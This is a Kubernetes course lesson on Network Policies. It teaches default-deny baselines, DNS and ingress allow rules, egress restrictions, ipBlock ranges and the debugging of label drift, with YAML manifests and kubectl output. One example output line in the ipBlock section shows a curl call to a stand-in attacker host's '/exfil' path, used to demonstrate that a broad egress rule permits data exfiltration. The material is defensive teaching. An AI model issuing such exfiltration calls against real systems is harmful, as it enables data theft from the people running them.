Kubernetes Lesson 36 – Network Policies | Dataplexa

Networking, Ingress & Security · Lesson 36

Network Policies

By default, every Pod in your cluster can send traffic to every other Pod — no restrictions, no firewall rules, complete open access. That's fine for a development laptop. For a production cluster handling payment data and user credentials, it's a serious risk. Network Policies are Kubernetes's built-in firewall — and this lesson shows you how to use them to enforce least-privilege networking.

Why the Default is Dangerous

Imagine a microservices cluster with 40 services. Without Network Policies, if an attacker compromises the frontend service, they can immediately make direct TCP connections to your PostgreSQL database, your Redis cache, your internal admin API, and every other service — no additional credentials needed if those services trust internal traffic. This is lateral movement — moving from a compromised entry point deeper into the system.

Network Policies let you say exactly which Pods can talk to which other Pods, on which ports, in which direction. If your frontend only needs to call the order API on port 8080, you can write a policy that allows exactly that — and blocks the frontend from reaching the database, the payment processor, and everything else it has no business touching.

⚠️ Network Policies require a CNI plugin that enforces them

Network Policies are just Kubernetes objects — they do nothing without a CNI plugin that reads and enforces them. Flannel does not enforce Network Policies. Calico, Cilium, WeaveNet, and most other production CNI plugins do. If you apply a Network Policy on a Flannel cluster, the policy is silently ignored. Check which CNI your cluster uses before relying on Network Policies for security.

How Network Policy Selection Works

A Network Policy has three key components. The podSelector identifies which Pods the policy applies to — these are the Pods whose ingress/egress traffic will be controlled. The policyTypes field declares whether the policy affects incoming traffic (Ingress), outgoing traffic (Egress), or both. The ingress/egress rules specify what is allowed — from which sources, to which destinations, on which ports.

Two critical rules govern how policies combine:

Rule 1 — Default deny when a policy exists. The moment any Network Policy selects a Pod, traffic that is not explicitly allowed by any policy is denied. You don't need a separate "deny all" policy — the absence of an allow rule IS the deny.

Rule 2 — Multiple policies are ORed together. If two Network Policies both select the same Pod, a connection is allowed if it is permitted by either policy. The policies don't AND together — any matching allow rule wins.

The Default Deny Baseline

The recommended production pattern is to start with a default-deny policy for every namespace, then add explicit allow rules for the traffic that needs to flow. This is the allowlist model — deny everything by default, explicitly permit what's needed.

The scenario: You're hardening the payments namespace. It processes card data and has PCI DSS compliance requirements. The first step is to block all traffic that isn't explicitly permitted.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all             # Descriptive name — clearly communicates intent
  namespace: payments                # Apply to the payments namespace only
spec:
  podSelector: {}                    # {} = empty selector = applies to ALL Pods in the namespace
  policyTypes:
    - Ingress                        # Block all incoming traffic to any Pod
    - Egress                         # Block all outgoing traffic from any Pod
                                     # No ingress or egress rules defined = deny everything
                                     # This is the "closed" baseline — nothing flows until explicitly allowed

$ kubectl apply -f default-deny-all.yaml
networkpolicy.networking.k8s.io/default-deny-all created

$ kubectl get networkpolicy -n payments
NAME               POD-SELECTOR   AGE
default-deny-all   <none>         4s

$ kubectl run test-pod --image=nicolaka/netshoot --rm -it --restart=Never -n payments
bash-5.1# curl -v http://payment-api-svc:80/health --max-time 3
curl: (28) Connection timed out after 3001 milliseconds

bash-5.1# nslookup payment-api-svc
;; connection timed out; no servers could be reached

(even DNS is blocked — DNS queries (UDP 53) to CoreDNS are now denied)

What just happened?

POD-SELECTOR: <none> — The empty selector ({}) means "select all Pods in this namespace." Every Pod in the payments namespace is now subject to this policy. The output shows <none> which is how kubectl displays an empty selector.

DNS is blocked too — The egress deny is total. Even DNS queries (UDP port 53 to the CoreDNS ClusterIP) are blocked. This is why applying a default-deny policy without immediately adding DNS allow rules will break every application in the namespace. Always pair a default-deny policy with the DNS allow rule that comes next.

Connection timeout vs connection refused — Network Policy violations typically manifest as connection timeouts (the packet is dropped, not rejected). This is different from "connection refused" which means the port is reachable but nothing is listening. A timeout during debugging often means a Network Policy is blocking the traffic.

Allowing DNS and Specific Ingress Traffic

After the default deny, you need to selectively allow what should work. The first rule to add is always DNS — without it, nothing resolves. Then add your application-specific allow rules one by one.

The scenario: You've applied the default deny. Now you need: (1) DNS to work for all Pods, (2) the payment API to accept requests from the checkout service in the production namespace, and (3) the Prometheus monitoring stack to scrape metrics from the payment API. Nothing else should be allowed in.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns-egress             # Every namespace with a default-deny needs this
  namespace: payments
spec:
  podSelector: {}                    # Apply to all Pods
  policyTypes:
    - Egress
  egress:
    - ports:
        - protocol: UDP
          port: 53                   # DNS over UDP
        - protocol: TCP
          port: 53                   # DNS over TCP (for large responses)
                                     # No 'to' selector = allow to any destination
                                     # This allows DNS to CoreDNS regardless of its IP

---

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-payment-api-ingress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api               # This policy applies only to payment-api Pods
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:         # Only from the 'production' namespace
            matchLabels:
              kubernetes.io/metadata.name: production
          podSelector:               # AND only from Pods labelled app=checkout-api
            matchLabels:
              app: checkout-api
            # Note: namespaceSelector + podSelector in the same list item = AND
            # namespaceSelector and podSelector as separate list items = OR
        - namespaceSelector:         # Also allow from the 'monitoring' namespace
            matchLabels:
              kubernetes.io/metadata.name: monitoring
          podSelector:
            matchLabels:
              app: prometheus        # Only from Prometheus Pods in monitoring namespace
      ports:
        - protocol: TCP
          port: 8080                 # Only allow traffic on the API port
        - protocol: TCP
          port: 9090                 # Prometheus metrics scrape port

$ kubectl apply -f allow-dns-and-payment-ingress.yaml
networkpolicy.networking.k8s.io/allow-dns-egress created
networkpolicy.networking.k8s.io/allow-payment-api-ingress created

$ kubectl get networkpolicy -n payments
NAME                        POD-SELECTOR        AGE
default-deny-all            <none>              2m
allow-dns-egress            <none>              5s
allow-payment-api-ingress   app=payment-api     5s

(from a checkout-api Pod in the production namespace:)
$ curl http://payment-api-svc.payments.svc.cluster.local:8080/health
{"status":"healthy"}   ← checkout-api can now reach payment-api

(from a frontend Pod in the production namespace:)
$ curl http://payment-api-svc.payments.svc.cluster.local:8080/health --max-time 3
curl: (28) Connection timed out   ← frontend cannot reach payment-api (not in allow list)

What just happened?

AND vs OR in the from selector — This is the most confusing part of Network Policy syntax. When namespaceSelector and podSelector appear in the same list item (under the same -), they are ANDed — "must be in THIS namespace AND have THIS label." When they appear as separate list items (each with their own -), they are ORed — "from this namespace OR from Pods with this label." Getting this wrong is the most common Network Policy mistake.

kubernetes.io/metadata.name — Namespaces have a built-in label kubernetes.io/metadata.name automatically set to the namespace's name (added in Kubernetes 1.21). Using it in namespaceSelector is the correct way to reference a specific namespace by name in Network Policies.

Ports specified at the rule level, not the selector level — The ports list applies to the entire ingress rule. Both the checkout-api source and the Prometheus source share the same port allowance (8080 and 9090). If you need different ports for different sources, put them in separate ingress rule blocks.

Egress Policies: Controlling Outbound Traffic

Egress policies control what Pods can connect to. They're essential for preventing data exfiltration — a compromised Pod shouldn't be able to make outbound connections to attacker-controlled servers. They're also important for multi-tier applications where only specific services should be able to reach the database.

The scenario: The payment API should only be allowed to connect to: the PostgreSQL database on port 5432, the fraud detection service on port 8080, and external DNS. Everything else — the internet, other internal services — should be blocked. This prevents a compromised payment API from exfiltrating card data to an external server.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-api-egress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api               # Apply this egress policy to payment-api Pods only
  policyTypes:
    - Egress
  egress:
    - to:
        - podSelector:               # Allow to postgres Pods in the same namespace
            matchLabels:
              app: postgres
      ports:
        - protocol: TCP
          port: 5432                 # PostgreSQL port only

    - to:
        - namespaceSelector:         # Allow to fraud-detection service in its namespace
            matchLabels:
              kubernetes.io/metadata.name: fraud-detection
          podSelector:
            matchLabels:
              app: fraud-svc
      ports:
        - protocol: TCP
          port: 8080

    - ports:                         # Allow DNS (no 'to' selector = any destination)
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
                                     # Nothing else is allowed outbound from payment-api
                                     # The internet, AWS APIs, other cluster services — all blocked

$ kubectl apply -f payment-api-egress.yaml
networkpolicy.networking.k8s.io/payment-api-egress created

(from inside a payment-api Pod:)
$ nc -zv postgres.payments.svc.cluster.local 5432
Connection to postgres.payments.svc.cluster.local 5432 port [tcp/postgresql] succeeded!

$ nc -zv fraud-svc.fraud-detection.svc.cluster.local 8080
Connection to fraud-svc.fraud-detection.svc.cluster.local 8080 port [tcp] succeeded!

$ curl --max-time 3 https://api.stripe.com/v1/charges
curl: (28) Connection timed out   ← outbound internet blocked ✓

$ nc -zv order-svc.production.svc.cluster.local 8080 --max-time 3
nc: connect to order-svc.production.svc.cluster.local port 8080 (tcp) timed out   ← blocked ✓

What just happened?

Data exfiltration blocked — The payment API can reach its database and the fraud service, but not the internet or any other cluster service. If an attacker gains code execution in the payment API pod, they can't make outbound calls to their C2 server or to any other internal service to pivot laterally. The blast radius of a compromise is dramatically contained.

DNS allows no destination restriction — The DNS egress rule has a ports section but no to section. This allows DNS queries to any destination on port 53. Technically you could restrict it to the CoreDNS ClusterIP specifically using an ipBlock rule, but the IP might change across clusters. The port-only approach is the pragmatic production choice.

Egress policies interact with ingress policies — For a connection from payment-api to postgres to succeed, both the egress policy on payment-api (allowing outbound to postgres:5432) AND the ingress policy on postgres (allowing inbound from payment-api) must permit the traffic. A connection is only allowed if both sides have matching allow rules.

Network Policy Architecture for a Production Namespace

Here's the complete Network Policy architecture for the payments namespace — all policies working together to implement least-privilege networking:

payments namespace — Network Policy map

checkout-api
production ns

→ :8080 ✓

allowed by
allow-payment-api-ingress

payment-api
payments ns

Policies applied:
default-deny-all
allow-dns-egress
allow-payment-api-ingress
payment-api-egress

→ :5432 ✓

allowed by
payment-api-egress

postgres
payments ns

❌ frontend → payment-api
Blocked: frontend not in the allow list for payment-api ingress

❌ payment-api → internet
Blocked: no egress rule permits external destinations

❌ payment-api → order-svc
Blocked: order-svc not in payment-api's egress allowlist

✅ prometheus → payment-api:9090
Allowed: monitoring ns + prometheus label in ingress rule

IPBlock: Controlling External Traffic

So far all examples have used label selectors to identify traffic sources and destinations. For traffic from outside the cluster — specific IP ranges, on-premises CIDRs, or external APIs — you use ipBlock.

The scenario: The payment API needs to make outbound calls to an external payment gateway at 198.51.100.0/24 on port 443. All other external internet traffic should remain blocked.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: payment-api-external-egress
  namespace: payments
spec:
  podSelector:
    matchLabels:
      app: payment-api
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 198.51.100.0/24   # Allow to this specific external IP range
            except:
              - 198.51.100.10/32    # Except this specific IP within the range
              - 198.51.100.11/32    # And this one — perhaps deprecated gateway endpoints
      ports:
        - protocol: TCP
          port: 443                 # HTTPS only

    - to:
        - ipBlock:
            cidr: 0.0.0.0/0        # All IPs
            except:
              - 10.0.0.0/8         # Except private ranges — prevents reaching internal services
              - 172.16.0.0/12      # via external CIDR rules
              - 192.168.0.0/16
      ports:
        - protocol: TCP
          port: 443                 # Allow all other HTTPS — useful for cloud provider APIs

$ kubectl apply -f payment-api-external-egress.yaml
networkpolicy.networking.k8s.io/payment-api-external-egress created

(from inside a payment-api Pod:)
$ curl --max-time 3 https://198.51.100.1/api/charge
HTTP/2 200   ← payment gateway reachable ✓

$ curl --max-time 3 http://198.51.100.1/api/charge
curl: (28) Connection timed out   ← port 80 blocked, only 443 allowed ✓

$ curl --max-time 3 https://api.attacker.com/exfil
HTTP/2 200   ← WAIT — if 0.0.0.0/0 except RFC1918 is allowed, external HTTPS reaches everything

What just happened?

ipBlock for external traffic — Unlike pod/namespace selectors which apply within the cluster, ipBlock lets you specify external IP ranges. The except list carves out sub-ranges from the allowed CIDR. This is how you allow the specific payment gateway IPs while blocking everything else in that subnet.

The broad 0.0.0.0/0 except RFC1918 risk — The second egress rule in the example above is a common but dangerous pattern. Allowing all external HTTPS except private ranges sounds safe — but it allows the Pod to reach any public server on port 443. A compromised Pod can exfiltrate data to any HTTPS endpoint on the internet. Prefer explicit CIDR allowlists over broad "except private ranges" rules for sensitive workloads.

Debugging Network Policies

The scenario: Service A stopped being able to reach Service B after a network policy was applied. You need to diagnose which policy is blocking the traffic.

kubectl get networkpolicy -n payments
# List all network policies in the namespace — see what's active

kubectl describe networkpolicy allow-payment-api-ingress -n payments
# Full policy detail: podSelector, policyTypes, full ingress/egress rules
# Compare the from/to selectors against the labels on your Pods

kubectl get pod payment-api-7d9c4b-xr7nq -n payments --show-labels
# Check the actual labels on the target Pod
# Labels must EXACTLY match the podSelector in the NetworkPolicy

kubectl get namespace production --show-labels
# Check namespace labels — namespaceSelector requires the namespace to have matching labels
# New namespaces may not have the kubernetes.io/metadata.name label on older clusters

kubectl run netpol-debug --image=nicolaka/netshoot --rm -it --restart=Never \
  -n production --labels="app=checkout-api"
# Launch a debug Pod with the exact same labels as the allowed source
# Test connectivity from a Pod that SHOULD be allowed
# Then test from a Pod without those labels — confirm the policy works bidirectionally

kubectl exec -it netpol-debug -n production -- nc -zv -w3 \
  payment-api-svc.payments.svc.cluster.local 8080
# nc -zv: test TCP connectivity without sending data
# -w3: timeout after 3 seconds
# Timeout = blocked by NetworkPolicy or no Pod listening
# "Connection refused" = reached the Pod but port isn't open

$ kubectl get pod payment-api-7d9c4b-xr7nq -n payments --show-labels
NAME                           READY   STATUS    LABELS
payment-api-7d9c4b-xr7nq       1/1     Running   app=payment-api,version=3.1.0

$ kubectl describe networkpolicy allow-payment-api-ingress -n payments
...
Spec:
  PodSelector: app=payment-api
  Ingress:
    From:
      NamespaceSelector: kubernetes.io/metadata.name=production
      PodSelector: app=checkout-api
      ...

$ kubectl get namespace production --show-labels
NAME         STATUS   LABELS
production   Active   kubernetes.io/metadata.name=production   ← label present ✓

(problem found: the checkout-api Pod was recently redeployed with a new label app=checkout instead of app=checkout-api)

$ kubectl get pod -n production -l app=checkout-api
No resources found   ← selector matches nothing!

$ kubectl get pod -n production -l app=checkout
NAME                             LABELS
checkout-api-9c4b2f-2xkpj        app=checkout,version=2.4.0   ← label drift!

What just happened?

Label drift breaks Network Policies silently — The checkout deployment was updated and someone changed the label from app=checkout-api to app=checkout. The Network Policy still references the old label. The checkout pods no longer match the Network Policy's podSelector — so their traffic is blocked as if they're unknown sources. The fix is either to update the Network Policy to match the new label or revert the label change.

The most common Network Policy debug workflow — (1) List policies in both namespaces. (2) Check Pod labels match the selectors. (3) Check namespace labels match the namespaceSelector. (4) Run a test Pod with matching labels and test from it. (5) Run a test Pod without the labels and confirm it's blocked. The --labels flag on kubectl run is the key to simulating the right identity for these tests.

Teacher's Note: Start permissive, tighten incrementally

The mistake I see teams make most often with Network Policies is applying a default-deny to production the same day they write the first policy, then spending the next week firefighting as one service after another breaks. The correct approach is incremental: start without a default-deny, add explicit allow policies first, validate that all necessary traffic is covered, then add the default-deny last once you're confident the allow rules are complete.

One more thing: Network Policies are namespace-scoped, but the effect of a policy can cross namespaces via namespaceSelector. A policy in the payments namespace can allow traffic from the production namespace. This cross-namespace visibility is intentional and powerful — but it means label hygiene on both namespaces and Pods is critical for security. A mislabelled namespace could inadvertently grant access.

For Cilium users: Cilium extends the standard Network Policy with CiliumNetworkPolicy which supports L7 rules — allow traffic from checkout-api to payment-api only on the POST /charges endpoint, reject all other paths. This is Layer 7 microsegmentation and it's significantly more powerful than port-level Network Policies for HTTP traffic.

Practice Questions

1. A Network Policy is blocking traffic between two Pods. When the blocked Pod tries to connect, does it see a "connection refused" error or a "connection timeout"? Why?

2. Two Network Policies both select the same Pod. Policy A allows ingress from namespace X. Policy B allows ingress from namespace Y. Can Pods from both namespaces X and Y reach the target Pod?

3. A Network Policy needs to allow egress traffic to an external payment gateway at the IP range 198.51.100.0/24. Since this is not a Kubernetes Pod, you cannot use podSelector or namespaceSelector. Which field do you use instead?

Quiz

Up Next · Lesson 37

RBAC Introduction

Network Policies control what services can talk to each other. RBAC controls what humans and automated systems can do with the Kubernetes API — and getting it wrong is how clusters get compromised through the control plane.

← Previous Course Index Next →

Kubernetes Course

Network Policies

Why the Default is Dangerous

How Network Policy Selection Works

The Default Deny Baseline

Allowing DNS and Specific Ingress Traffic

Egress Policies: Controlling Outbound Traffic

Network Policy Architecture for a Production Namespace

IPBlock: Controlling External Traffic

Debugging Network Policies

Practice Questions

Quiz